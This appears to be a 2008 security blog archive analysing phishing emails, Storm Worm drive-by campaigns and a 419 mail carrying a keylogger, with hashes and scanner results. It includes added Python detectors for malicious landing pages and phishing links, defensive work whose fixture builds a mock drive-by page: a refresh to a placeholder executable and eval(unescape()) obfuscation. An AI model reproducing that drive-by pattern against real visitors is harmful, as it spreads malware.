I thought it is about time for me to cover this again due to the current world-wide credit crunch and fuel, power and food costs soaring. This means many people are looking for ways to cut costs; including costs for protecting their computers. FREE isn't a bad word, but the bad guys and girls have started to make it feel like it ought to be. The phrase Caveat Emptor [Let The Buyer Beware] seems to be more pertinent than ever.

What do I mean by "the bad guys and girls have started to make it feel that it ought to be"? Let me explain:

Look at these for examples of the rather naughty ways that the bad guys and girls are trying to get you to download and use their anti-virus:

First they try scare tactics:



Then they try a little more direct approach:



If you are foolish enough to go to the sites, then this is what you'd currently see:



Looks very professional, doesn't it? Hard to believe that this is a bad site! Want proof? OK, here it is:



That is the very same site [URL] but visited using Firefox 3.x instead.

But that isn't all; this site is also being promoted by a botnet called Asprox. This botnet searches for sites backed by SQL databases and then tries to run SQL injection exploit code which, if successful, overwrites all URLs in the database with a single link. If this now 'bogus' link is clicked on a website that uses the SQL-injected database for content, it starts a chain reaction, which often ultimately ends up either on the site shown above, or it may infect vulnerable systems using exploit code that was run as part of the chain reaction. This may include infecting your system and making it part of the Asprox botnet.

But there's more.....

Here's a screenshot of another e-mail I received recently:



The link, if foolishly clicked on, takes you here:



Does it look familiar?

Here's a screenshot of the source of the above page:



Notice how it uses the REFRESH function to pop up a download of the executable they offer; no, it isn't anti-virus software, it is actually malware!

So, who can you trust if you want FREE anti-virus software?

These are the FREE ones I'd personally recommend:


Please be aware that there are a number of 'bogus' anti-spyware tools out there too and probably even 'bogus' personal firewalls.

You can find all the links mentioned above, and other useful tools, etc. here.

At the end of the day, to help keep your system free of net nasties and their kin, you need to ensure that you have a personal firewall, up to date anti-virus installed, anti-spyware tool(s) installed, and last but not least practice 'Safe-Hex'.

Computer problems are bad enough most of the time, which means the following anti-stress kit might be useful. However, once you add malware to the more usual computer problems it becomes a must-have piece of kit; well, it stops the common hair-loss normally associated with stress! ;-)





Hopefully, this posting will help you retain your sanity, or at least reduce the cranial damage you may do to yourself using the above anti-stress kit.

Be careful out there, the web is a dangerous place without suitable protection...

If any of you out there in blog land have other security software that you recommend then please feel free to drop me a line or leave the details in a comment. Thanks!


Thursday, 24 July 2008

Phishing for Feedback?

According to the e-mail I received this morning HSBC have a customer survey they would like me to take.

For starters here's a screenshot of the e-mail I received:



I'm always willing to give feedback to companies I use, but I am not an HSBC customer, so let's see where we go when the link is clicked:



Looks like a normal survey so far, apart from the dodgy website address [IP dotted]. So let me fake some data and click on the submit button, here goes:



Ah, now I smell something very phishy indeed [even if I didn't before ;-)]. They want some account details; Ker-ching!

Oh, yes and there is no prize money, so don't expect to win, just like the fake lottery notifications that you get, it is just a scam.

Each phishing e-mail I receive is checked; all links are tested against the Netcraft toolbar, and any new ones, that the Netcraft toolbar doesn't yet know about are submitted for inclusion in their database. Nothing too unusual there. However, once in a while I spot something that makes a new phish stand out from the crowd, such as this one.

At the time I tested these links to the bogus [phishy] HSBC survey site it was not detected by the Netcraft toolbar, or even the Firefox anti-phishing functions which are now built into the browser. As I finish up writing this post Netcraft should now have it in their database as I sent them the details.

Just be careful when acting on requests for participating in surveys for companies you use, as they may be phishy and you may get more than you bargained for. In those phishy cases it is likely that your personal data will be stolen and used to make fraudulent transactions on your account.


Friday, 4 July 2008

A Stormy Independence Day...

It seems that the so-called 'Storm Worm Gang' are back and couldn't resist the opportunity to try and get you to infect your computer again using the guise of a 4th of July [American Independence Day] firework show. This latest wave started early this morning:

The subjects of the e-mails I've seen so far include:

America the Beautiful
Celebrating the spirit of our Country
Time for Fireworks
Well done 4th!
Light up the sky
The best firework you've ever seen
Long Live America
Celebrating the Glory of our Nation
American Independence Day

The body of all the e-mails seen so far contains a single line of text and a URL [the usual dotted IP sort, e.g. http://100.123.12.1]; here is just a small selection of the text I've seen used so far:

A Hearty Wish
Amazing Independence Day show
Stars and Strips forever
Well done 4th!
Celebrate the spirit of America
Happy Independence Day
Home of the Brave
Spectacular fireworks show
Long Live America
Amazing Independence Day salute

Here's a screenshot of one of the emails that I've received this morning:



Here's a screenshot of another one of the emails that I've received this morning [Can you spot the difference ;-)]:



If you are foolish enough to click on the link in the email, you'll end up on a page that looks like this:



And here is the source of the web page currently in use:



The more eagle-eyed of you may have noticed that the code includes an IFRAME which loads a PHP file called 'ind.php'; this is what part of the page source code looks like for that file:



You may notice that this uses an obfuscated JavaScript routine, the end result, if you have JavaScript enabled in your web browser and your anti-malware doesn't detect this malcode, is that a dropper will be written to your hard disk. This is effectively a 'drive-by-download' as you don't have to click on anything on the webpage to download the file hidden in the JavaScript in 'ind.php'. The lower part of the code has been digitally munged by myself, as you don't need to see all of it.
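As an added example (not code from the original posts), here is a small static triage script in Python that looks for the three landing-page tricks described here and in the fake anti-virus post earlier on this page: a META REFRESH that pushes an executable download, an IFRAME pulling in a server-side loader such as 'ind.php', and heavily obfuscated inline JavaScript. The sample page it runs against is constructed for the example; the host name in it is a placeholder, not the real site.

```python
import re
from html.parser import HTMLParser

# Extensions that should never be the target of an automatic refresh/redirect.
EXECUTABLE_EXTS = (".exe", ".scr", ".pif", ".com", ".bat")
# Server-side scripts pulled in by an IFRAME, as with the 'ind.php' loader.
SERVER_SCRIPT_EXTS = (".php", ".asp", ".aspx", ".cgi")


class _Collector(HTMLParser):
    """Collects <meta> and <iframe> attributes and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.metas, self.iframes, self.scripts = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta":
            self.metas.append(attrs)
        elif tag == "iframe":
            self.iframes.append(attrs)
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and self.scripts:
            self.scripts[-1] += data


def refresh_target(content):
    """Pull the URL out of a meta refresh content attribute, e.g. '0;url=http://...'."""
    m = re.search(r"url\s*=\s*['\"]?([^'\"\s;]+)", content, re.I)
    return m.group(1) if m else None


def _path_ends_with(url, exts):
    # Ignore query string and fragment when looking at the extension.
    return url.lower().split("?", 1)[0].split("#", 1)[0].endswith(exts)


def is_hidden(attrs):
    """True for the 1x1 / display:none IFRAMEs typical of drive-by loaders."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = all(attrs.get(k, "").strip("px") in ("0", "1") for k in ("width", "height"))
    return tiny or "display:none" in style or "visibility:hidden" in style


def obfuscation_indicators(js):
    """Cheap heuristics for packed/escaped JavaScript; returns the indicators hit."""
    hits = []
    if re.search(r"\b(eval|unescape)\s*\(", js):
        hits.append("eval/unescape")
    if "String.fromCharCode" in js:
        hits.append("String.fromCharCode")
    if len(re.findall(r"%[0-9a-fA-F]{2}", js)) > 50:
        hits.append("dense %xx escapes")
    longest = max((len(s) for s in re.findall(r"'[^']*'|\"[^\"]*\"", js)), default=0)
    if longest > 200:
        hits.append(f"string literal of {longest} chars")
    return hits


def triage_page(html):
    """Return a list of (severity, reason) findings for one HTML document."""
    p = _Collector()
    p.feed(html)
    p.close()
    findings = []
    for m in p.metas:
        if m.get("http-equiv", "").lower() == "refresh":
            target = refresh_target(m.get("content", ""))
            if target and _path_ends_with(target, EXECUTABLE_EXTS):
                findings.append(("high", f"meta refresh pushes executable download: {target}"))
    for f in p.iframes:
        src = f.get("src", "")
        hidden = is_hidden(f)
        if hidden or _path_ends_with(src, SERVER_SCRIPT_EXTS):
            findings.append(("medium", f"iframe loads {src!r} (hidden={hidden})"))
    for js in p.scripts:
        hits = obfuscation_indicators(js)
        if len(hits) >= 2:
            findings.append(("high", "obfuscated inline script: " + ", ".join(hits)))
    return findings


# Constructed sample page (not the real one): a %xx-escaped payload handed to eval(unescape()).
_ESCAPED = "".join("%%%02x" % b for b in b"document.write('<p>dropper goes here</p>');" * 4)
SAMPLE_LANDING = f"""<html><head>
<meta http-equiv="refresh" content="0;url=http://example.invalid/fireworks.exe">
</head><body>
<iframe src="ind.php" width="1" height="1" style="display:none"></iframe>
<script>var a="{_ESCAPED}";eval(unescape(a));</script>
</body></html>"""
```

Running `triage_page(SAMPLE_LANDING)` reports all three findings; a page with only a plain inline script and no refresh or iframe comes back empty.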

At the time of posting this blog entry the detection of the offered 'fireworks.exe' file was still not complete, with only 20 out of 32 tested scanners identifying that this is a malicious file.

Furthermore the file being offered is not a static binary, as in my testing so far each request ends up serving a file which appears to be different, not in size but the MD5 hash is not the same. I'm not sure whether this is a case of server-side polymorphism or just a pool of pre-compiled executables from which one is chosen at random.

If I get any further useful data or news then I'll try and update this entry later today.

For those of you celebrating this particular holiday, I would like to wish you a very happy day and enjoy the real fireworks rather than the fake ones being offered in the latest Storm Worm run.

Oh by the way, I forgot to mention that this isn't the first time that fireworks have been used to get people to infect their own computers, anyone remember 'Happy99.exe' (also-known-as 'Ska')?


Thursday, 3 July 2008

The Tax Man Giveth....

If you are anything like me you probably can't remember the last time the 'Tax Man' [those from HM Revenue and Customs] told you that you had paid too much tax and that he [or she] would like to return some money to you....Yeah right, like that is going to happen! I think I can honestly say that I have NEVER had any form of refund from them, ever, and I've been working for almost 30 years.

So, when I received the following e-mail [screenshot below] I was already rather sceptical:



The email looks quite believable, doesn't it? Even the link looks real.

If you are foolish/brave enough to click on the link, this is what you will see in your web browser:



Again, very believable, especially if you have no anti-phishing solutions in place.

If you are foolish/brave enough to fill in the requested data and then click on the link, this is what you will see in your web browser next:



Finally, if you are foolish/brave enough to fill in the requested financial data and then click on the link, this is what you will see in your web browser:



Yes, if you clicked on the final page you will be taken from the 'phishy' HMR&C site to the 'real' HMR&C site, none the wiser that you have been 'phished'. The final image [above] is the real HMR&C site.

Usual fare for the Phishers, they want your personal details so that they can steal money from your account or use the details to open new accounts or credit arrangements in your name, so when they default on the loan, you'll be the one being hassled or taken to court for non-payment.

Meanwhile your credit rating will nose-dive, and it will take you weeks, months or even years to recover from the effects. All because you were 'phooled by a phish'.

So, if you get an e-mail stating that you have a tax refund.....be warned as you may end up even more out of pocket than you would if you were dealing with the real HMR&C, at least they are up-front about it! So, to finish the second half of the line used for the title of this posting "The Tax Man Giveth [NOT] and the Phishers Fake it to Take it all!"


Friday, 27 June 2008

I'll Have a 419 With a Side Order of Malware, Please....

No, this isn't about an order being placed at my local Chinese restaurant or takeaway; their menu item numbers don't go up that far, believe me I have checked ;-).

So for starters, let me show you a screenshot of an e-mail I received this morning:



Looks like a pretty typical 419 scam e-mail doesn't it? A little more terse than usual, I'll grant you, but still a 419 scam, hang on it has an attachment, most unusual! Here's a screenshot showing the attached file:



An executable file, very suspicious and most unusual for it to be attached to a 419 scam. I wonder what the Bad Guys and Girls from Lagos are up to now? I think a bit of testing and investigation is in order, don't you?

Some details on the executable file first:

FileName: 108 3386 8257.exe
FileDateTime: 26/06/2008 11:38:39
Filesize: 303842
MD5: 3e5480b34a38d2dc5e1f45f561c7d5f2
CRC32: F7A3CF76
File Type: PE Executable

This is a WinRAR SFX [self-extracting executable archive] and it contains the following files:

108 3386 8257.txt
gbt.exe
gbthk.dll
inst.dat
kw.dat
pk.bin
rinst.exe


So, let me extract the files, no not by running the RAR SFX file, as that would infect my system with the malware contained inside it.

Of these only one is a true executable file, this is:
FileName: rinst.exe
FileDateTime: 24/06/2007 21:08:18
Filesize: 19456
MD5: f3d0beef15eb987dbcec8e803bf6c89d
CRC32: 94F8865E
File Type: PE Executable

This file "rinst.exe" is packed using Armadillo and the executable itself appears to be written using Microsoft Visual C++.

This is the main installation file, and if you are foolish enough to run the attachment, all the enclosed files are dropped to "C:\WINDOWS\TEMP\RarSFX0" and then it proceeds to run "rinst.exe" to perform the install of the malcode; in this case it also tries to identify and kill any recognised anti-malware tools. Once installed it attempts to load the "108 3386 8257.txt" file which contains the following text:

MTCN CONTROL NUMBER 108 3386 8257
AMOUNT : $3,450USD
RECIEVER : JONATHAN NWEKE,LAGOS NIGERIA

The rest of the files appear to be obfuscated files that are part of the installation of a keylogger, so not only is this malware attempting to kill any security defences you have in place, it is also trying to record what you type, etc. Nasty!

So next time you receive a 419, have a closer look and see if the Bad Guys and Girls from Lagos have included an attachment to get you to infect your computer and steal your personal data. It seems that they have finally learned that this is now a multi-billion dollar business, and if they fail to adapt then they will either get left behind or other professional cyber-criminals will take their traditional business away from them.

If you want to know more about 419 scams and their genesis, then you can find more here.

Right, back to my analysis of this to find out what else it does...


Monday, 23 June 2008

Would You Rather Be A Mule [REDUX]?

How many of you out there have seen job offers [both part-time and full-time positions] that look like the following screenshots:








Tempted to apply, or do they seem too-good-to-be-true?

Well, they are too-good-to-be-true; all the screenshots of the e-mails are nothing more than an attempt to recruit staff to act as money launderers, also known as mules.

I've written about mules before on this blog, but I thought it was time to revisit the area as the bad guys and girls have been very active in trying to recruit new mules just recently.

So, a quick recap:

"We are not talking about four legged creatures that are half horse and half donkey….think more of drug couriers who are more usually referred to as Mules!

Now, in most cases Mules are those that either carry things for others [hence the use of the term] or act as laundering points, such as in organized crime syndicates, they do the dirty work of moving material from A to B and usually have little or no idea that what they are doing is illegal. They may even be acting as a Mule under duress, such as blackmail, etc."

Next time you see a job advert on the web, in the local paper or receive a job offer via e-mail, stop and think is this really legit, or am I about to be turned into a mule, or as the song goes:

"Would you like to swing on a star
carry moonbeams home in a jar
and be better off than you are
or would you rather be a mule

A mule is an animal with long funny ears
he kicks up at anything he hears
His back is brawny but his brain is weak
he's just plain stupid with a stubborn streak
and by the way if you hate to go to school
You may grow up to be a mule..."

The full lyrics can be found here.

By all means swing on a star, but not if it means you grow up to be a mule...to fund the lifestyle, and end up broken, saddled with a criminal record, and end up corralled in jail with numerous other mules, while those that run the scams get away with turning the endless train of desperate people [including students] into yet more mules.


Thursday, 19 June 2008

They're Back!!! Beijing Earthquake

Early this morning we started to see emails pushing a new variant of the so-called 'Storm Worm'. These are using a similar tactic to those that gave the malware authors their name; in this case it isn't real storms but a fictional new earthquake in Beijing, China.

Here is a screenshot showing many of the subject lines seen so far for this new Storm Worm run:



Here is a screenshot of one of the e-mails I have received:



Most of them do not have the anti-virus scanning message at the bottom; I picked this one as I'm not sure whether this was added by one of the infected clients, or as part of the next wave, as some form of extra social-engineering ploy. It should also be noted that they have gone back to using real domain names for this run, instead of their more usual dotted IP addresses. According to F-Secure, these are all fast-fluxed.

Here's a screenshot of the website you would end up on if you clicked on the link:



The file offered is not a video; it is, not surprisingly, an executable file. Here are the details of a sample I downloaded earlier today:

FileName: beijing.exe
FileDateTime: 19/06/2008 12:56:05
Filesize: 83608
MD5: 3752f1a45c897471369f5f17dc42c8ee
CRC32: DA97A2FB
File Type: PE Executable


Here are the scan results of the currently offered file 'beijing.exe' as scanned by over 30 up-to-date malware scanners:

@Proventia-VPS NOT DETECTED
AntiVir Worm/Zhelatin.zc
Avast! Win32:TDrop [Drp]
AVG NOT DETECTED
BitDefender Trojan.Peed.JLV
CA-AV NOT DETECTED
CA-AV (BETA) NOT DETECTED
ClamAV NOT DETECTED
Command NOT DETECTED
Dr Web NOT DETECTED
eSafe File [100] (suspicious)
Ewido NOT DETECTED
F-Prot NOT DETECTED
F-Secure NOT DETECTED
F-Secure (BETA) NOT DETECTED
Fortinet NOT DETECTED
Fortinet (BETA) NOT DETECTED
Ikarus Email-Worm.Win32.Zhelatin.zy
Kaspersky NOT DETECTED
McAfee NOT DETECTED
McAfee (BETA) NOT DETECTED
Microsoft NOT DETECTED
Nod32 Win32/Nuwar worm
Norman NOT DETECTED
Panda NOT DETECTED
Panda (BETA) NOT DETECTED
QuickHeal NOT DETECTED
Rising NOT DETECTED
Sophos W32/Nuwar-E
Sunbelt NOT DETECTED
Symantec NOT DETECTED
Symantec (BETA) NOT DETECTED
Trend Micro NOT DETECTED
Trend Micro (BETA) NOT DETECTED
VBA32 NOT DETECTED
VirusBuster NOT DETECTED
WebWasher Worm.Zhelatin.zc
YY_A-Squared NOT DETECTED
YY_Spybot Worldsecurityonline.FakeAlert,,Executable


It should also be noted that the Storm-Worm gang are trying something new with this new variant: they are using Alternate Data Streams [ADS]. In this case there is an ADS called Zone.Identifier, which is a text file that contains:

[ZoneTransfer]
ZoneId=3

I'm not quite sure what they are using this for at the moment, maybe some form of tracking data?

UPDATE: This may actually be nothing to do with the Storm Worm gang after all [the ADS part, that is], as it seems that this may be a new 'feature' of Firefox 3.x instead, sneaky!

So what do you do if you receive such an e-mail? Simply delete it, do not click on the link and definitely do not download and launch the file that is offered, and finally update your anti-virus at least once a day, as otherwise you will become a victim. Hopefully most anti-virus products will be able to detect this within the next 24 hours.


Monday, 16 June 2008

Every Little Helps...

Is the catchphrase for Tesco [a very well known UK supermarket] who sent me an e-mail today informing me that I "have added an additional email address to my account", see below for the full e-mail:



The email address it was sent by was "customer@tesco.com" which is also the return address in the raw e-mail headers too. So, let's see where we end up when we click on one of the four links in the e-mail itself, shall we?

Here's a screenshot of the website that we end up on [using Opera 9.50].....Hmmmm...Tesco.com [according to the tab text]. Looks like the real thing, but is it?



How many of you spotted the red warning in the browser's address bar? It reads [!Fraud site]*. Bit of a giveaway, and also when I clicked on the link in the e-mail it actually goes to a dotted IP address, before being redirected [probably some form of click fraud] to the bogus Tesco.com site shown in the screenshot above. Yes, it is a Phishing site, not the real Tesco.com at all!
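The dotted IP behind this Tesco link, the bare-IP URLs in the Storm Worm runs and the 'link looks real' trick in the HMRC refund post earlier on this page can all be caught by a few link checks before anyone clicks. Here is an added Python example (not code from the original posts) that pulls the links out of a mail body, HTML or plain text, and flags any whose host is a bare IP address, whose visible text names a different domain from the target, or whose domain does not belong to the brand the mail claims to come from. The sample mails are constructed; 203.0.113.7 is a documentation address, and 100.123.12.1 is the illustrative example already used on this page.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

_URL_RE = re.compile(r"https?://[^\s<>\"']+")
_DOMAIN_IN_TEXT_RE = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})")
# Second-level labels under which the registrable name is three labels long (hmrc.gov.uk).
_SECOND_LEVEL = {"co", "gov", "org", "ac", "net", "com"}


class _Anchors(HTMLParser):
    """Collects (href, visible text) for every <a> tag in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = ""

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = ""

    def handle_data(self, data):
        if self._href is not None:
            self._text += data

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, self._text.strip()))
            self._href = None


def registered_domain(host):
    """Rough registrable domain: www.hmrc.gov.uk -> hmrc.gov.uk, www.tesco.com -> tesco.com."""
    labels = host.lower().strip(".").split(".")
    if len(labels) >= 3 and labels[-2] in _SECOND_LEVEL and len(labels[-1]) == 2:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def extract_links(body):
    """HTML bodies yield anchor links; plain text bodies yield the bare URLs found in them."""
    if re.search(r"<a\s", body, re.I):
        p = _Anchors()
        p.feed(body)
        p.close()
        return p.links
    return [(u, u) for u in _URL_RE.findall(body)]


def check_links(body, claimed_domain=None):
    """Return (href, reason) findings; claimed_domain is the brand the mail says it is from."""
    findings = []
    for href, text in extract_links(body):
        host = urlparse(href).hostname or ""
        ip = is_ip_literal(host)
        if ip:
            findings.append((href, "link points at a bare IP address"))
        shown = _DOMAIN_IN_TEXT_RE.search(text.lower())
        if shown and (ip or registered_domain(shown.group(1)) != registered_domain(host)):
            findings.append((href, f"link text shows {shown.group(1)} but target is {host}"))
        if claimed_domain and not ip and registered_domain(host) != registered_domain(claimed_domain):
            findings.append((href, f"mail claims to be from {claimed_domain} but links to {host}"))
    return findings


# Constructed samples (not the real mails).
SAMPLE_HMRC = ('<p>Our records show you are eligible for a tax refund.</p>'
               '<a href="http://203.0.113.7/hmrc/refund.php">https://www.hmrc.gov.uk/refund</a>')
SAMPLE_STORM = "Amazing Independence Day show http://100.123.12.1"
SAMPLE_TESCO = '<p>An additional email address was added to your account.</p>' \
               '<a href="http://tesco-account-update.example/login">Sign in to review</a>'
```

`check_links(SAMPLE_HMRC, claimed_domain="hmrc.gov.uk")` reports both the bare IP and the text/target mismatch, while a genuine link under the claimed domain produces no findings.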

So, what is the site and what is it trying to achieve?

Well, this appears to be a Phishing scam, but instead of being targeted at a bank or other financial organisation, or Paypal, eBay, eGold, etc. it is targeting customers of a supermarket instead. This is the first time I've seen a supermarket being the target of a Phishing scam run, most unusual!

Not sure why the bad guys and girls are targeting Tesco customers, unless the stolen customer login details are just a way for them to gain access to any stored credit/debit card details on the Tesco.com account? Maybe they are just hungry ;-)

So, is this a new trend; can we expect similar Phishing scams for Sainsbury's, Waitrose, Marks and Spencer's and Morrisons? Unfortunately, I expect so, so please be very careful and if you have the option on any such service do NOT store your credit/debit card details; it may make shopping faster, but it also makes identity theft easier too.....as Tesco states "Every Little Helps", just don't let it be true for the bad guys and girls by allowing them to gain access to your personal information and credit/debit card details.

* This is a new feature in the latest version of Opera.


Tuesday, 27 May 2008

The FBI Have Contacted Me!

I received the following e-mail [screenshot below] this morning which says it has come from the FBI; not only that, it states that it was sent by FBI Director Robert S. Mueller the Third of the Anti-terrorist and Monetary Crimes Division and that if I don't respond and/or supply the requested information I'll be charged!





It goes on to say that I have $10,500,000.00 being wired to me via a Secured Diplomatic Transit Account [S.D.T.A] and I need to prove that I have the required paperwork, including a Diplomatic Immunity Seal of Transfer [DIST] and an FBI Identification Record (aka a Rap Sheet or Criminal History Record) to prove I am who I claim to be and that I'm not a terrorist or drugs dealer. If I can supply these proofs, then the money is all mine!

OK, how many of you out there reading this would go along with this? Hands up, so I can count ;-)

Now, how many of the rest of you smell something fishy? Well, it isn't a Phish at all, it is just another new version of the so-called 419 scam.

The twist here is that the Boys and Girls from Lagos [or almost anywhere else in the World now] are using fear as a new social engineering tactic to get you to part with personal data, which they will then either misuse or sell to others.

If you somehow, miraculously come up with the requested proofs, then guess what, you won't get any money at all, because there is no money in the first place, and the e-mail isn't from the FBI [or anyone in law-enforcement], surprise! ;-)

Whatever you do, don't fall for this scam [or any of its relations]; it relies on what the Lagos boys call Wad [rich, greedy people]. They also use a less polite name for the people they dupe: Mgbada*.

To the Boys and Girls from Lagos [the 419ers that run these scams] it is a business; some say it should be considered an African cottage industry. However they want to try and justify it, it is still a crime, no more, no less.

Other unusual examples of 419s I've covered include

Lots of other examples have also been covered over the years on this blog, and I have written several articles for Virus Bulletin on 419s, which can be found here.

* If anyone can tell me what this means in English, then please e-mail me, thanks.


Wednesday, 7 May 2008

EICAR 2008 Conference Paper Now Available

This is a quick update on my posting from yesterday, and to announce that the full paper for the EICAR 2008 conference which was held earlier this week is now available for download as a PDF [Adobe Acrobat] file.

To refresh your memories, here is the abstract from the paper, entitled "Where To Now: Detecting The Unknown":
The increasing speed of new malware strains being written and released means that security professionals are more likely than ever before to see new malware.

This means new malware which is not detected by the anti-malware solutions they have deployed in their infrastructure, be it workstation, server, PDA or at the gateway.

Imagine this scenario: An end-user calls the helpdesk and reports that their system is running very sluggishly when it wasn't a week ago and that they can't access the Windows 'Task Manager' or open a command prompt any more.

Is this caused by malware or is it a 'user' problem? The virus scanner is right up to date and active, and it says the system is clean, the personal firewall is active too. Where do you go from here? Investigate or rebuild the box?

How can you tell if the machine is clean or infected by a new malware, with a reasonable level of confidence for your conclusion?

This paper will look at what tricks, tools and techniques you can use to help establish the true state of the 'suspect' system. It will focus on a step by step approach of what tools to use, what to look for and what to do with any suspicious files. It will also discuss the use of forensic tools in such a scenario, as a last port of call.

The paper will draw on real scenarios where new [undetected] malware has been responsible for 'odd' system or network behaviour.

The paper can be downloaded via the following links:

As usual all feedback is most welcome.


Tuesday, 6 May 2008

No, I [Still] Haven't Fallen Off The Edge Of The World....

Or been kidnapped by aliens, gone over to the dark side or gone down with a virus [or should that now be malcode?].

It seems that about this time every year I end up writing a post like this, so here is this year's version. ;-)

Sorry for the lack of blog entries over the last month or so, but I've been writing a conference paper for the EICAR international conference which is, as I write this, being held in Laval, France.

So, am I writing this blog entry from there? No, unfortunately not, let me explain...

Why am I not presenting my paper at EICAR 2008 in Laval, France? Why am I not there today?

Well, the decision was made because we [the new team/service I'm part of] were in the middle of a major analysis of new malcode, and this was a very high priority. It was decided at a commercial level that it would be better if I were available at a moment's notice if new samples were found that required immediate analysis. If I were in Laval, France, I would be unable to work on live malcode and keep in contact.

So, I'd like to apologise once more to EICAR that I was unable to attend and present my paper at the conference. Hopefully, if the team I'm now part of is expanded this won't have to happen again. Anyone that attended EICAR will have still seen my paper presented, but by Eric Filiol [who does not work for IBM or ISS] instead. This was the best solution we could come up with at the last moment.

The paper will be made available later this week at the following locations*:


Writing the paper for EICAR is only one of the reasons for my lack of posting, other changes have been afoot!

Firstly, I have moved to a new company, well sort of, I now work for Internet Security Systems, who as some of you may know were acquired by IBM a while ago. So, I now work for ISS, which is owned by IBM. However, my role has changed as I now work in the X-Force Professional Security Services section as a Malware Analyst and Consultant.

So, what does this new role involve?

The main part of it is malware analysis and reverse-engineering. So, in some ways I have stepped back in time to the sort of work I used to do when I wrote my own anti-virus detection and remediation tools [whilst I was working for another company]. However, the game has changed quite a bit since then; luckily my skills are not that rusty, so I have managed to get back up to speed very quickly. Other skills I have picked up and honed over the years will probably also be required for other parts of my new role; more on that another time.

However, that is not all that has kept me from posting recently, other things include:

  • Lecturing at the University of Warwick on malware and internet security later this month, so my slides need to be updated and tweaked before then.

  • Writing and submitting abstracts for this year's Virus Bulletin conference, to be held in Ottawa, Canada.

  • Building systems and finding/creating tools to help in the analysis of new samples, they just keep coming!

  • Working very long hours on malcode analysis.

Normal [once or twice a week postings] service will be resumed as soon as I can find that elusive 25th hour in the day, or I decide to give up trying to get any sleep at all!



* All my published papers and articles can be found at those web addresses.


Tuesday, 1 April 2008

Don't 'Fool' For It...

Normally I do my own April Fools blog posting, using some bogus malware, anti-malware or other computer related bit of nonsense for a bit of fun, and hopefully you find them funny, or at least interesting?

However, this year I didn't need to bother, as the Bad Guys and Girls have their own; trouble is, it isn't a joke, and it certainly isn't funny!

It seems that the so-called 'Storm Worm Gang' are back playing the fool again and couldn't resist the opportunity to try and get you to infect your computer using the guise of an April Fools e-card. This new wave started late last night/early this morning [depending where you are in the world]:

The subjects of the e-mails I've seen so far include:
Surprise!
Happy April Fools!
Happy All Fool's Day
Gotcha! April Fool!
Gotcha! All Fool!
I am a Fool for your Love
Today You Can Officially Act Foolish
Join the Laugh-A-Lot
Surprise! The joke's on you

The body of all the e-mails seen so far contain a single line of text and a URL [the usual dotted IP sort, e.g. http://100.123.12.1]

Here's a screenshot of one of the emails that I've received this morning:



If you are foolish enough to click on the link in the email, you'll end up on a page that looks like this:



After 5 seconds you'll see a download dialogue box, like this:



And here is the source of the web page currently in use:



However you spend the day, whatever jokes you play or end up the victim of, don't 'Fool' for this one, as otherwise your computer will get infected and the Bad Guys and Girls will have the last laugh again, at your expense!

At the time of posting this blog entry the detection of the offered 'funny.exe' file was rather poor, with less than half of 32 tested scanners identifying that this is a malicious file. This is the default file and is automatically offered for download [within 5 seconds of the page rendering].

You may have noticed that two other filenames appear in the HTML source; these are:
kickme.exe
foolsday.exe

If you click on the image you get kickme.exe, and if you click on "click here" you get foolsday.exe instead.

If I get any further useful data or news then I'll try and update this entry later today or tomorrow.

Whilst I was browsing the web looking for a good basis for an April Fools blog posting, I found these:


Please let me know if you spot any more, thanks!


Monday, 10 March 2008

3D Screensaver E-mails?

This morning I started to receive e-mails offering me screensavers. I immediately smelt a rat, well at least a malware author, anyway! ;-)

So, I took a look at it in more detail; here's a screenshot of one of the e-mails:



I clicked on the link to see where I'd end up, and you can see what I found, below:



Looks like a very professional and polished website offering 3D Screensavers; very believable, isn't it?

So, I clicked on one of the links offered and I ended up here:



Still very believable, so I proceeded to download a copy of the screensaver offered, so that I could analyse it [you didn't think I was actually going to install it, did you? ;-)].

Will you be surprised to learn that the results of my analysis showed that this wasn't a screensaver at all, it was a piece of malware. I then proceeded to download several other samples, from the other selections offered, and the resulting files, although having different names, were all the same size [18,944 bytes], had the same MD5 hash value [which means they are all effectively identical internally], and were not being detected by a number of anti-malware tools.

At the time of posting this the files I downloaded from the site were named "Screensaver-66713.scr", "Screensaver-8719.scr" and "Screensaver-83580.scr", this of course may change, and there are certainly others with different filenames being offered.

If you see an e-mail like the one shown above, then simply delete it, as otherwise you will infect your computer, rather than save its screen.

Hopefully by the end of today most anti-malware vendors should have updated their products to detect it.

So, in those immortal words, "Be careful out there...."


Wednesday, 5 March 2008

Stealthed Spam, Redux II!

The spammers are upping the stakes in the stealthed spam arena again. This entry will cover a stealthed spam I received this morning, but before that let me suggest that if you don't know what I am talking about, then you should take a look at my previous blog entries covering this area. These are [30th January 2008] and [17th October 2007]. This will also allow you to follow the development of this as a spamming technique.

So, now if you know what I mean by stealth and stealth spam, let me show you the latest example I have seen, just today, in fact:

The body of the e-mail would have you believe that it is from 'Irwin Bank and Trust':



With the above example, all the URLs [web-links] used in the e-mail except one point to the real bank's site! All the text is probably taken from the real bank's website. This e-mail passes the tests that most of us use to decide if something is spam or not; in other words it passes the 'Eyeball' test fairly easily as it looks pretty genuine. The only missing pieces are any remote graphics, which most e-mail programs will not show, at least not by default.

So, what does it look like when I enable 'allow remote images' in the e-mail program?

It looks like this [yes, it is the same e-mail]:



Now it fails the 'Eyeball' test with ease.

Although the stealthed e-mail shown above is pretty convincing, it isn't perfect, as the e-mail address it shows as the from address [admin@viagra.com] and the subject used [RE:February 83% OFF] are not consistent with the rest of the e-mail and are obviously spammy. So, the spammers need to sort these problems out to create the perfect stealthed spam.

Why do I call this 'Stealthed Spam'? Well, simply because the spam component is hidden and not in plain view, at first.

